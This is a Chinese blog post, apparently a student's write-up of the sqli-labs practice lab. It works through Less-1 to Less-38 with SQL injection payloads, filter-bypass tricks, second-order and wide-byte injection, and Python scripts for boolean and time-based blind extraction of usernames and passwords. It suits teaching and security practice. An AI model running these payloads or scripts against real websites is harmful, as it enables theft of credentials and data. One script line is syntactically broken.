<!DOCTYPE html>
<html>

<head><meta name="generator" content="Hexo 3.9.0">
  
  <title>Sqli-labs - M1N&#39;s Blog</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  

  <link rel="shortcut icon" href="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png" type="image/png">
  <meta name="description" content="注入语句备忘 查库名：select schema_name from information_schema.schemata 查表名：select table_name from information_schema.tables where table_schema=&amp;#39;库名&amp;#39; 查列名：select column_name from information_schema.colum">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-labs">
<meta property="og:url" content="http://blog.m1n.me/2019/10/12/Sqli-labs/index.html">
<meta property="og:site_name" content="M1N&#39;s Blog">
<meta property="og:description" content="注入语句备忘 查库名：select schema_name from information_schema.schemata 查表名：select table_name from information_schema.tables where table_schema=&amp;#39;库名&amp;#39; 查列名：select column_name from information_schema.colum">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/1.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/2.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/3.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/4.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/5.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/6.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/7.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/8.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/9.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/10.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/11.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/12.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/13.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/14.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/15.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/16.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/17.png">
<meta property="og:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/18.png">
<meta property="og:updated_time" content="2020-03-06T12:55:06.137Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sqli-labs">
<meta name="twitter:description" content="注入语句备忘 查库名：select schema_name from information_schema.schemata 查表名：select table_name from information_schema.tables where table_schema=&amp;#39;库名&amp;#39; 查列名：select column_name from information_schema.colum">
<meta name="twitter:image" content="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/1.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/css/mdui.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.15.8/styles/atom-one-dark.css">
   
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1038733_0xvrvpg9c0r.css">
  <link rel="stylesheet" href="/css/style.css?v=1589790461633">
</head>

<body class="mdui-drawer-body-left">
  
  <div class="nexmoe-bg" style="background-image: url(https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/4.jpg)"></div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/">
            <img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>17</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>8</div>
    </div>
    <ul class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
    </ul>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/clhclh1/clhclh1.github.io" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/AWD/">AWD</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Bypass/">Bypass</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Docker/">Docker</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux基础命令/">Linux基础命令</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQL注入/">SQL注入</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Writeup/">Writeup</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/文件上传/">文件上传</a><span class="category-list-count">2</span></li></ul>
    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">十一月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">十月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">九月 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 M1N
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->

<script>
    const getRealPath = (pathname, desc = false) => {
        if (!pathname) {
            pathname = window.location.pathname
        }
        let names = pathname.split("/")
        if (desc === false) {
            for (let i = names.length - 1; i >= 0; --i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        } else {
            for (let i = 0; i < names.length; ++i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        }
        return "/"
    }
    let links = document.querySelectorAll('.nexmoe-list-item');
    let rootRealPath = getRealPath(window.location.pathname, true);
    for (let link of links) {
        let linkPath = link.getAttribute("href");
        if (linkPath && getRealPath(linkPath, true) === rootRealPath) {
            link.className = "active nexmoe-list-item mdui-list-item mdui-ripple";
        }
    }
</script>
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-tab">
            <a mdui-drawer="{target: '#drawer', swipe: true}">
              <i class="mdui-icon material-icons">menu</i>
            </a>
          </div>
        <div class="nexmoe-post">
    <div class="nexmoe-post-cover"> 
        
        <img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/9.jpg">
        
        <h1>Sqli-labs</h1>
    </div>
  <div class="nexmoe-post-meta">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年10月12日</a>
    <a><i class="nexmoefont icon-areachart"></i>2,714 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 13 分钟</a>
    
      <a class="nexmoefont icon-appstore-fill -link" href="/categories/SQL注入/">SQL注入</a>
    
    
  </div>
  <article>
    <h1 id="注入语句备忘"><a href="#注入语句备忘" class="headerlink" title="注入语句备忘"></a>注入语句备忘</h1><ol>
<li>查库名：<code>select schema_name from information_schema.schemata</code></li>
<li>查表名：<code>select table_name from information_schema.tables where table_schema=&#39;库名&#39;</code></li>
<li>查列名：<code>select column_name from information_schema.columns where table_name=&#39;表名&#39;</code></li>
<li>查数据：<code>select 列名 from 库名.表名</code><a id="more"></a>
<h1 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h1></li>
<li>可将用引号包含的库名，表名转换为十六进制，避免引号被过滤</li>
<li>数据过多时可以利用limit限制数据数量</li>
<li>同上也可以用<code>concat</code>链接多个数据成为一条返回结果</li>
<li>…</li>
</ol>
<h1 id="注入类型判断小技巧"><a href="#注入类型判断小技巧" class="headerlink" title="注入类型判断小技巧"></a>注入类型判断小技巧</h1><p>1和1”正常回显，1’报错，判断为字符型，但是还要判断是否有小括号。</p>
<p>判断小括号有几种方法：</p>
<ol>
<li>2’&amp;&amp;’1’=’1<ul>
<li>若查询语句为where id=’$id’，查询时是where id=’2’&amp;&amp;’1’=’1’，结果是where id=’2’，回显会是id=2。</li>
<li>若查询语句为where id=(‘$id’)，查询时是where id=(‘2’&amp;&amp;’1’=’1’)，MySQL 将’2’作为了 Bool 值，结果是where id=(‘1’)，回显会是id=1。</li>
</ul>
</li>
<li>1’)||’1’=(‘1<br>若查询语句有小括号正确回显，若无小括号错误回显（无回显）。</li>
</ol>
<h1 id="sqli-labs测试"><a href="#sqli-labs测试" class="headerlink" title="sqli-labs测试"></a>sqli-labs测试</h1><h2 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h2><ol>
<li>构造<code>127.0.0.1/Less-1/?id=1</code>成功返回数据</li>
<li>构造<code>127.0.0.1/Less-1/?id=1&#39;</code>出现报错说明存在注入点</li>
<li>构造<code>127.0.0.1/Less-1/?id=1&#39; order by 3--+</code>测试有几列</li>
<li>构造<code>127.0.0.1/Less-1/?id=-1&#39; union select 1,2,3--+</code>查看回显点//此时需要令查询的id不存在<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/1.png" alt="sql"></li>
<li>构造<code>127.0.0.1/Less-1/?id=-1&#39; union select 1,2,(select schema_name from information_schema.schemata)--+</code>查询数据库名。发现报错说数据过多，此时就可以利用limit构造：<code>127.0.0.1/Less-1/?id=-1&#39; union select 1,2,(select schema_name from information_schema.schemata limit 0,1)--+</code>依次进行查看。<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/2.png" alt="sql"><br>或者可以利用<code>group_concat</code>构造：<code>?id=-1&#39; union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+</code><br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/3.png" alt="sql"></li>
<li>构造：<code>127.0.0.1/Less-1/?id=-1&#39; union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;)--+</code>查询表名<br>此时‘security’可以用十六进制替换，或者用database()<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/4.png" alt="sql"></li>
<li>构造：<code>127.0.0.1/Less-1/?id=-1&#39; union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;)--+</code>查询段名<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/5.png" alt="sql"></li>
<li>构造：<code>?id=-1&#39; union select 1,2,(select concat_ws(0x7e,username,password) from security.users limit 0,1)--+</code>查询数据<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/6.png" alt="sql"><br>也可以构造：<code>?id=-1&#39; union select 1,2,(select group_concat(username,0x7e,password) from security.users)--+</code>查询数据<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/7.png" alt="sql"></li>
</ol>
<p>至此，sqli-labs的第一关就算是结束了</p>
<h2 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h2><p>这一关总体和第一关是一样的，只是这里是整型注入，因此不用单引号去闭合，其余操作和第一关相同</p>
<h2 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h2><p>这一关是利用<code>&#39;)</code>来闭合</p>
<h2 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h2><p>这一关是利用<code>&quot;)</code>来闭合</p>
<h2 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h2><p>这关开始就是盲注了，并且通过判断可以得知这是布尔盲注<br>直接丢出脚本：</p>
<pre><code>import requests
import time

url = &quot;http://47.96.233.216:8080/Less-5/?id=1&#39;&quot;

test = &quot;select database()&quot;

schema = &quot;select schema_name from information_schema.schemata limit 0,1&quot;

table = &quot;select table_name from information_schema.tables where table_schema=database() limit 1,1&quot;

column = &quot;select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1&quot;

data = &quot;select concat_ws(0x5e,username,password) from security.users limit 0,1&quot;

result = &quot;&quot;

for i in range(1,10):
    for j in range(48,122):
        payload = url + &quot; and ascii(substr(({}),{},1))={}--+&quot;.format(data,i,j)
        # print(payload)
        r = requests.get(payload)
        l = len(r.text)
        # print(l)
        if(l==704):
            result+=chr(j)
            print(result)
            break
</code></pre><p>这个脚本还是比较偏向手动化的。。。。</p>
<h2 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h2><p>用<code>&quot;</code>闭合</p>
<h2 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h2><p>用<code>&#39;))</code>闭合，但是此时的设定是无论是否正确，返回的数据长度是一样的。此时改变判断方式：</p>
<pre><code>import requests

url = &quot;http://47.96.233.216:8080/Less-7/?id=1&#39;))&quot;

test = &quot;select database()&quot;

schema = &quot;select schema_name from information_schema.schemata limit 0,1&quot;

table = &quot;select table_name from information_schema.tables where table_schema=database() limit 1,1&quot;

column = &quot;select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1&quot;

data = &quot;select concat_ws(0x5e,username,password) from security.users limit 0,1&quot;

result = &quot;&quot;

for i in range(1,10):
    for j in range(48,122):
        payload = url + &quot; and ascii(substr(({}),{},1))={}--+&quot;.format(test,i,j)
        r = requests.get(payload)
        txt = r.text
        l = len(r.text)
        s = &quot;You are in.... Use outfile......&quot;
        if(s in txt):
            result+=chr(j)
            print(result)
            break
</code></pre><h2 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h2><p>这一关的闭合方式还是单引号，而且好像和第五关没啥差别？？？只要改一下返回数据长度脚本一样是可以用的？？</p>
<h2 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h2><p>通过测试我们可以发现无论所查询的数据是否存在，都会返回”You are in….“，可以推断这次不是布尔盲注而是时间盲注。丢出时间盲注的脚本：</p>
<pre><code>import requests
import time

url = &quot;http://47.96.233.216:8080/Less-9/?id=1&#39;&quot;

test = &quot;select database()&quot;

schema = &quot;select schema_name from information_schema.schemata limit 0,1&quot;

table = &quot;select table_name from information_schema.tables where table_schema=database() limit 0,1&quot;

column = &quot;select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1&quot;

data = &quot;select concat_ws(0x5e,username,password) from security.users limit 0,1&quot;

result = &quot;&quot;

for i in range(1,10):
    for j in range(48,122):(test,i,j)
        payload = url + &quot; and if(ascii(substr(({}),{},1))={},sleep(2),1)--+&quot;.format(data,i,j)
        t1 = time.time()
        r = requests.get(payload)
        t2 = time.time()
        if(t2-t1&gt;=2):
            result+=chr(j)
            print(result)
            break
</code></pre><h2 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h2><p>用<code>&quot;</code>闭合</p>
<h2 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h2><p>由于请求方式是post，因此要用BurpSuit抓包，可以发现账号密码处存在注入点<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/8.png" alt="sql"><br>#Less-12<br>同上，用<code>&quot;)</code>闭合<br>#Less-13<br>可以发现页面没有回显，通过返回图片的不同可以发现是bool盲注，而且时间盲注应该是可以的，但是由于返回的数据包不同点是图片不相同，不能通过判断长度进行布尔盲注，可以用<code>if(s in r.txt)</code>进行判断<br>先放一下脚本：</p>
<pre><code>import requests

url = &quot;http://47.96.233.216:8080/Less-13/&quot;

test = &quot;select database()&quot;

schema = &quot;select schema_name from information_schema.schemata limit 0,1&quot;

table = &quot;select table_name from information_schema.tables where table_schema=database() limit 1,1&quot;

column = &quot;select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1&quot;

data = &quot;select concat_ws(0x5e,username,password) from security.users limit 0,1&quot;

result = &quot;&quot;

for i in range(1,10):
    for j in range(48,122):
        payload = &quot;admin&#39;) and ascii(substr(({0}),{1},1))={2} #&quot;.format(test,i,j)
        post_r = {&quot;uname&quot;:payload,&quot;passwd&quot;:&quot;admin&quot;}
        r = requests.post(url,data=post_r)
        l = len(r.text)
        txt = r.text
        s = &quot;../images/flag.jpg&quot;
        if (s in txt):
            result+=chr(j)
            print(result)
            break</code></pre><p>以及一个网上找的一个较好的脚本‘<a href="https://blog.csdn.net/vhkjhwbs/article/details/98960802’：" target="_blank" rel="noopener">https://blog.csdn.net/vhkjhwbs/article/details/98960802’：</a></p>
<pre><code>import requests

chars = &quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&amp;%/^!~&quot;
result = &quot;&quot;

def get_length(value):  #获取要查询的数据的长度
    for n in range(1,100):
        payload = &quot;admin&#39;) and length(({0})) ={1} #&quot;.format(data_payload,n)
        data = {&quot;uname&quot;:payload,&quot;passwd&quot;:&quot;admin&quot;}
        html = requests.post(url,data=data)
        length = len(html.text)
        if length &gt;value:
            print(&quot;……data length is :&quot; + str(n))
            return  n

def get_data(data_length,value): #获取数据
    global result
    for i in range(1,data_length):
        for char in chars:
            payload = &quot;admin&#39;)and ascii(substr(({0}),{1},1))={2} #&quot;.format(data_payload,i,ord(char))
            data = {&quot;uname&quot;:payload,&quot;passwd&quot;:&quot;admin&quot;}
            html = requests.post(url,data=data)
            length = len(html.text)
            if length&gt;value:         #根据返回长度的不同来判断字符正确与否
                result += char
                print(&quot;…… data is :&quot;+ result)
                break


url = &quot;http://47.96.233.216:8080/Less-13/&quot;
data_payload = &quot;select group_concat(table_name)from information_schema.tables where table_schema = database()&quot;
value = 1460 

length = get_length(value) +1
get_data(length,value)
print(result)
</code></pre><h1 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h1><p>用<code>&quot;</code>闭合</p>
<h1 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h1><p>同第十三关脚本</p>
<h1 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h1><p>用<code>&quot;)</code>闭合</p>
<h1 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h1><p>盲猜报错注入</p>
<h2 id="数据类型溢出"><a href="#数据类型溢出" class="headerlink" title="数据类型溢出"></a>数据类型溢出</h2><p>select exp(~(select*from(select user())x));   # MySQL &lt; 5.5.53<br>pow, cot</p>
<h2 id="几何函数报错"><a href="#几何函数报错" class="headerlink" title="几何函数报错"></a>几何函数报错</h2><p>select multipoint((select * from (select * from (select version())a)b)); # 低版本<br>geometrycollection multipoint polygon multipolygon linestring multilinestring等</p>
<h2 id="Xpath语法错误"><a href="#Xpath语法错误" class="headerlink" title="Xpath语法错误"></a>Xpath语法错误</h2><p>select updatexml(1,concat(0x3a,(select @@version),0x3a),1) # MySQL &gt; 5.1<br>select extractvalue(1,concat(0x3a,(select @@version),0x3a))</p>
<p>另外当concat被过滤时可以<br>updatexml(1,make_set(3,’’,(select version())),1)</p>
<h2 id="报错注入的几种函数及其用法："><a href="#报错注入的几种函数及其用法：" class="headerlink" title="报错注入的几种函数及其用法："></a>报错注入的几种函数及其用法：</h2><ol>
<li>floor():<code>select count(*) from infromation_schema.tables group by concat((select database()),floor(rand(0)*2));</code>group by 对rand()函数进行操作时产生错误</li>
<li>extractvalue():<code>extractualue(1,concat(0x7e,(select database()),0x7e));</code>XPATH语法错误报错</li>
<li>updatexml():<code>select updatexml(1,concat(0x7e,(select database()),0x7e),1);</code>XPATH语法错误报错</li>
<li>MYSQL5.7新增：<code>select gtid_subset((select @@version), 2);</code><br>在passwd处存在注入点：<br>payload：<code>11111&#39; or updatexml(1,concat(0x7e,(select database()),0x7e),321)--+</code><br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/9.png" alt="sql"><h1 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h1>可以猜测UA可能存在注入点<br>构造UA<code>&#39;and extractvalue(1,concat(0x7e,(select database()),0x7e)) and &#39;1&#39;=&#39;1</code><h1 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h1>reffer存在注入点，其余同上<h1 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h1>打开提示cookie，那就先抓个包，构造cookie<code>uname=admin&#39;</code>发现报错，可知存在注入点，其余就是正常步骤，先判断列数，可以发现是3。。。。<h1 id="Less-21"><a href="#Less-21" class="headerlink" title="Less-21"></a>Less-21</h1>用<code>&#39;)</code>闭合，并且是要经过base64编码，其余同上<h1 id="Less-22"><a href="#Less-22" class="headerlink" title="Less-22"></a>Less-22</h1>用<code>&quot;</code>闭合<h1 id="Less-23"><a href="#Less-23" class="headerlink" title="Less-23"></a>Less-23</h1><code>#</code>以及<code>--</code>被过滤<br>那就用<code>or &#39;1&#39;=&#39;1</code>来闭合多余出来的单引号<h1 id="Less-24"><a href="#Less-24" class="headerlink" title="Less-24"></a>Less-24</h1>二次注入<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/10.png" alt="sql"><br>先注册一个用户名为<code>admin&#39; #</code>的账号，虽然注册时会被转义，但是数据还是会被存入数据库，所以在接下来其他地方被调用时就会出现漏洞，即在改密码时，SQL语句拼接出<code>&quot;UPDATE users SET PASSWORD=&#39;$pass&#39; where username=&#39;admin&#39; #&#39; and password=&#39;$curr_pass&#39; &quot;</code>，</li>
</ol>
<p>就可以修改admin的密码，实现SQL注入<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/11.png" alt="sql"><br>就可以用admin账户登录<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/12.png" alt="sql"></p>
<h1 id="Less-25"><a href="#Less-25" class="headerlink" title="Less-25"></a>Less-25</h1><p>AND和OR都被过滤，但是UNION没有被过滤可以实现注入，并且可以通过双写来Bypass过滤：<code>id=-1&#39; oorr 1=1--+</code></p>
<h1 id="Less-25a"><a href="#Less-25a" class="headerlink" title="Less-25a"></a>Less-25a</h1><p>和25一样</p>
<h1 id="Less-26"><a href="#Less-26" class="headerlink" title="Less-26"></a>Less-26</h1><p>过滤了空格，本想着用<code>/**/</code>绕过，发现还是不行，一看源码：<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/13.png" alt="sql"><br>过滤了大部分的东西，本来想着绕过空格的方式：<br>%09 TAB键（水平）、%0a 新建一行、%0c 新的一页、%0d return功能、%0b TAB键（垂直）、%a0 空格，发现其中%a0以及%0b可用，<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/14.png" alt="sql"><br>或者需要用()绕过，使用报错注入的方式，构造payload：<code>?id=-1%27||extractualue(1,concat(0x7e,(select%20database()),0x7e))||%271%27=%271</code><br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/15.png" alt="sql"><br><code>0&#39;||updatexml(1,concat(&#39;$&#39;,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=&#39;security&#39;))),0)||&#39;1&#39;=&#39;1</code>爆表名<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/16.png" alt="sql"></p>
<h1 id="Less-26a"><a href="#Less-26a" class="headerlink" title="Less-26a"></a>Less-26a</h1><p>基于绕过过滤空格后的正确注入（可用%a0绕过），或者基于bool盲注，因为没有错误回显，所以不能报错注入</p>
<h1 id="Less-27"><a href="#Less-27" class="headerlink" title="Less-27"></a>Less-27</h1><p>题目说过滤了UNION和SELECT，但是查看源代码发现可以大小写绕过。。。同时过滤了空格和注释夫，可以用上面的方法绕过，payload“<code>?id=0&#39;%a0unIon%a0seleCt%a01,2,3||&#39;1&#39;=&#39;1</code></p>
<h1 id="Less-27a"><a href="#Less-27a" class="headerlink" title="Less-27a"></a>Less-27a</h1><p>用<code>&quot;</code>闭合，其余同上</p>
<h1 id="Less-28"><a href="#Less-28" class="headerlink" title="Less-28"></a>Less-28</h1><p>虽然题目说过滤了union和select，但是发现仍然是可以用的，不知道是环境问题还是题目本来就是这样的，同时是用<code>(&#39;</code>闭合的，且过滤了空格等，课用上面的方法绕过<br>payload：<code>?id=0&#39;)%a0union%a0select%a01,2,3||(&#39;1&#39;=&#39;1</code><br>后来才发现题目是过滤了<code>union select</code>这个词组，因为中间加了<code>%a0</code>,刚好绕过了检测</p>
<h1 id="Less-28a"><a href="#Less-28a" class="headerlink" title="Less-28a"></a>Less-28a</h1><p>同上，但是貌似减少课过滤的东西，更简单了？？</p>
<h1 id="Less-29"><a href="#Less-29" class="headerlink" title="Less-29"></a>Less-29</h1><p>尝试一下<code>?id=0%27union%20select%201,2,3--+</code>,发现好像啥也没过滤？？？<br>然后就和第一关一样了。。。</p>
<h1 id="Less-30"><a href="#Less-30" class="headerlink" title="Less-30"></a>Less-30</h1><p>先用单引号闭合发现没用，再用双引号闭合发现报错，接下来就和上面的一样了</p>
<h1 id="Less-31"><a href="#Less-31" class="headerlink" title="Less-31"></a>Less-31</h1><p>用<code>&quot;)</code>闭合，其余一样</p>
<h1 id="Less-32"><a href="#Less-32" class="headerlink" title="Less-32"></a>Less-32</h1><p>宽字节注入，payload：<code>?id=0%df%27%20union%20select%201,2,3--+</code></p>
<h1 id="Less-33"><a href="#Less-33" class="headerlink" title="Less-33"></a>Less-33</h1><p>同上</p>
<h1 id="Less-34"><a href="#Less-34" class="headerlink" title="Less-34"></a>Less-34</h1><p>这里的提交方式是post，但是又用/转义了’，一种方式是将utf-8转换为utf-16或 utf-32，例如将 ‘ 转为utf-16为�’ ，但是这%df仍然可以用<br>，再加上报错注入：<br><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/17.png" alt="sql"></p>
<h1 id="Less-35"><a href="#Less-35" class="headerlink" title="Less-35"></a>Less-35</h1><p>直接注。。。</p>
<h1 id="Less-36"><a href="#Less-36" class="headerlink" title="Less-36"></a>Less-36</h1><p>%df宽字节注入</p>
<h1 id="Less-37"><a href="#Less-37" class="headerlink" title="Less-37"></a>Less-37</h1><p>这一次就没有像34关一样简单，%df没有办法用了，但是可以将utf-8转换为utf-16或 utf-32，构造payload“<code>111�&#39; union select 1,(select database())--+</code></p>
<p><img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%86%85%E5%AE%B9/Sqli-labs/18.png" alt="sql"></p>
<h1 id="Less-38"><a href="#Less-38" class="headerlink" title="Less-38"></a>Less-38</h1><p>直接注。。。</p>

  </article>
  
    
<div class="nexmoe-post-copyright">
<i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
<strong>本文作者：</strong>M1N<br>
